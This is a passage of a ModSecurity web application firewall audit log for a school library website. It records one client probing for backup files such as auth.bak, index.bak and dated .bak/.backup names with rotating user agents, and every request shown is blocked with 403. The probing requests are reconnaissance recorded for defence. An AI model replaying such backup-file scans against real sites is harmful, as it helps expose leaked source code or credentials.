(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b617627-Z-- --eb53f56b-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oXgAAAFI 103.236.140.4 35018 103.236.140.4 8181 --eb53f56b-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700234 --eb53f56b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eb53f56b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227966015 1649 (- - -) Stopwatch2: 1747683227966015 1649; combined=708, p1=384, p2=287, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb53f56b-Z-- --ac30c34a-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oXwAAAEE 103.236.140.4 35018 103.236.140.4 8181 --ac30c34a-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:65.0.1) Gecko/20100101 Firefox/65.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906317 --ac30c34a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac30c34a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227967965 1550 (- - -) Stopwatch2: 1747683227967965 1550; combined=600, p1=301, p2=273, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac30c34a-Z-- --00ff8d16-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oYAAAAFc 103.236.140.4 35018 103.236.140.4 8181 --00ff8d16-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805060 --00ff8d16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --00ff8d16-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227972539 1705 (- - -) Stopwatch2: 1747683227972539 1705; combined=640, p1=308, p2=305, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00ff8d16-Z-- --2c95564b-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oYQAAAFM 103.236.140.4 35018 103.236.140.4 8181 --2c95564b-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182622 --2c95564b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2c95564b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227976359 1710 (- - -) Stopwatch2: 1747683227976359 1710; combined=679, p1=313, p2=323, p3=0, p4=0, p5=42, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c95564b-Z-- --805c8f75-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oZAAAAEc 103.236.140.4 35018 103.236.140.4 8181 --805c8f75-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872010 --805c8f75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --805c8f75-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227985386 1695 (- - -) Stopwatch2: 1747683227985386 1695; combined=704, p1=350, p2=328, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --805c8f75-Z-- --61787027-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopIAAAABE 103.236.140.4 34924 103.236.140.4 8181 --61787027-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152633521 --61787027-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --61787027-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227986046 1725 (- - -) Stopwatch2: 1747683227986046 1725; combined=705, p1=334, p2=345, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61787027-Z-- --77fa7101-A-- [20/May/2025:02:33:48 +0700] aCuHmzuVdcwZ_qZ5ZIopIgAAAAw 103.236.140.4 34924 103.236.140.4 8181 --77fa7101-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995070 --77fa7101-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --77fa7101-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227998504 1654 (- - -) Stopwatch2: 1747683227998504 1654; combined=659, p1=324, p2=302, p3=0, p4=0, p5=32, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77fa7101-Z-- --92db3266-A-- [20/May/2025:02:33:48 +0700] aCuHnDuVdcwZ_qZ5ZIopJgAAAAA 103.236.140.4 34924 103.236.140.4 8181 --92db3266-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3; rv:64.0.2) Gecko/20100101 Firefox/64.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906349 --92db3266-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --92db3266-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228013946 1739 (- - -) Stopwatch2: 1747683228013946 1739; combined=689, p1=316, p2=345, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92db3266-Z-- --c3075007-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF6QAAAMU 103.236.140.4 35138 103.236.140.4 8181 --c3075007-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161448019 --c3075007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c3075007-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228029707 2205 (- - -) Stopwatch2: 1747683228029707 2205; combined=723, p1=326, p2=354, p3=0, p4=0, p5=42, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3075007-Z-- --377ff342-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF6wAAAM8 103.236.140.4 35138 103.236.140.4 8181 --377ff342-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0.1) Gecko/20100101 Firefox/51.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906370 --377ff342-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --377ff342-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228035966 1935 (- - -) Stopwatch2: 1747683228035966 1935; combined=727, p1=358, p2=339, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377ff342-Z-- --f009c571-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF7AAAAMI 103.236.140.4 35138 103.236.140.4 8181 --f009c571-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906375 --f009c571-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f009c571-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228041909 2200 (- - -) Stopwatch2: 1747683228041909 2200; combined=923, p1=497, p2=393, p3=0, p4=0, p5=33, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f009c571-Z-- --b8d7b811-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oawAAAEw 103.236.140.4 35018 103.236.140.4 8181 --b8d7b811-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757740 --b8d7b811-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b8d7b811-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228063707 2340 (- - -) Stopwatch2: 1747683228063707 2340; combined=842, p1=440, p2=374, p3=0, p4=0, p5=27, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8d7b811-Z-- --85d8027e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9obQAAAEo 103.236.140.4 35018 103.236.140.4 8181 --85d8027e-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182639 --85d8027e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --85d8027e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228074764 2169 (- - -) Stopwatch2: 1747683228074764 2169; combined=818, p1=387, p2=402, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85d8027e-Z-- --f537714d-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF7QAAANA 103.236.140.4 35138 103.236.140.4 8181 --f537714d-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161448045 --f537714d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f537714d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228076548 1851 (- - -) Stopwatch2: 1747683228076548 1851; combined=685, p1=325, p2=332, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f537714d-Z-- --fd92c873-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ocAAAAFY 103.236.140.4 35018 103.236.140.4 8181 --fd92c873-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872024 --fd92c873-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fd92c873-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228107375 1777 (- - -) Stopwatch2: 1747683228107375 1777; combined=665, p1=317, p2=321, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd92c873-Z-- --c7cf0731-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ocQAAAEY 103.236.140.4 35018 103.236.140.4 8181 --c7cf0731-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872029 --c7cf0731-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c7cf0731-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228116117 2147 (- - -) Stopwatch2: 1747683228116117 2147; combined=705, p1=342, p2=337, p3=0, p4=0, p5=25, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7cf0731-Z-- --13c5c81f-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ocgAAAEU 103.236.140.4 35018 103.236.140.4 8181 --13c5c81f-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700282 --13c5c81f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13c5c81f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file 